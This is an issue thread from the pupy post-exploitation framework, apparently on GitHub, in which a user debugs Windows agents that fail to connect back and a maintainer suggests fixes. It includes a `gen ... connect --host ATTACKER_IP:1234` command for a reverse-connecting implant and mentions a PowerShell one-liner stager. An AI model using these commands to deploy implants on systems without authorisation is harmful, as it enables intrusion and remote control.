pupy
Agents don't connect back
After installing the containers and running the pupy image I tried to generate a simple agent which was supposed to connect back to the server on port 1234 by using the command `gen -f client -O windows -A x64 connect --host ATTACKER_IP:1234 -t ec4`. There's already a listener that exists and is listening on port 1234. However, when I run the agent on the victim machine no network traffic is even initiated.

I also tried to generate a `ps1_oneliner` agent which successfully retrieved the 2nd stage payload from the pupy docker webserver running on port 9000, but the retrieved payload didn't check in to the server.

What could be the problem?

Docker run command: `docker run --rm -it -p 1234:1234 -p 9000:9000 docker-pupy python pupysh.py`
You can add the `--debug` arg to `gen`. It should be clear what is going wrong there.
The command and its output are as follows:

```
>>gen --debug -f client -O windows -A x86 connect --host 172.16.151.236:1234 -t ec4
[+] Generate client: windows/x86
{ Configuration }
KEY              VALUE
--------------------------------------------------
launcher         connect
launcher_args    --host 172.16.151.236:1234 -t ec4
cid              1151546663
debug            True
[+] Required credentials (found)
 + SSL_BIND_CERT
 + ECPV_RC4_PRIVATE_KEY
 + ECPV_RC4_PUBLIC_KEY
[+] OUTPUT_PATH: /opt/pupy/pupy/output/pupyx86d.RrTgwS.exe
[+] SCRIPTLETS: []
[+] DEBUG: True
```

When run on the victim machine, the executable agent crashes and no output is displayed. I'll try to debug the executable to see what went wrong with it. In the meantime I'm sharing the results; maybe there's a quick fix or something small that I'm missing.
```
>>>listen
[+] ec4: 1234
>>>
```

and the output of `netstat -lntp`:

```
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp6       0      0 :::9000                 :::*                    LISTEN      2899/docker-proxy
tcp6       0      0 :::1234                 :::*                    LISTEN      2926/docker-proxy
tcp6       0      0 :::8443                 :::*                    LISTEN      2912/docker-proxy
```
The crash is happening in the function `sub_40C000`. For some reason the calculated final value of `ecx` points to some location in the `.data` section, which is not marked as executable, and that causes the program to crash.

Do you know what's the reason behind this?
> Do you know what's the reason behind this?

No idea what this is and where it is.

Once you have created a payload with debug, it creates two logs. At the beginning of execution it starts to output to stdout (but on Windows you will not see this, as it runs as an application with a window, so you need to redirect stdout to some file). Then it creates a low-level log at `AppData\Local\Temp`, and then the python payload also creates an additional log (python level) at `AppData\Local\Temp`.

You can also compile the payload with `FEATURE_POSTMORTEM`. It will enable SEH handlers and will write both python and low-level stack traces (including libraries loaded from memory).
> No idea what is this and where it is.

It's the disassembly code for the pupy 32-bit Windows executable agent.

> Once you created payload with debug, it creates two logs.

The crash seems to be happening before any of that, as I don't see any logs being created in or outside of `AppData\Local\Temp`.

> Also you can also compile payload with FEATURE_POSTMORTEM

Right now I'm using a dockerized pupy, and running the command `docker run --rm -it docker-pupy sh -c /opt/pupy/client/sources/buildenv.sh` asks me for a `[sudo] password for pupy:` which I don't have.
This looks like wrong (very old) binary templates used with a newer code base. Have you compiled them yourself, or are you using those embedded in the docker image from Docker Hub? If so, can you check that you are not using some really old image?
I'm using this one: https://github.com/Cyb3rWard0g/docker-pupy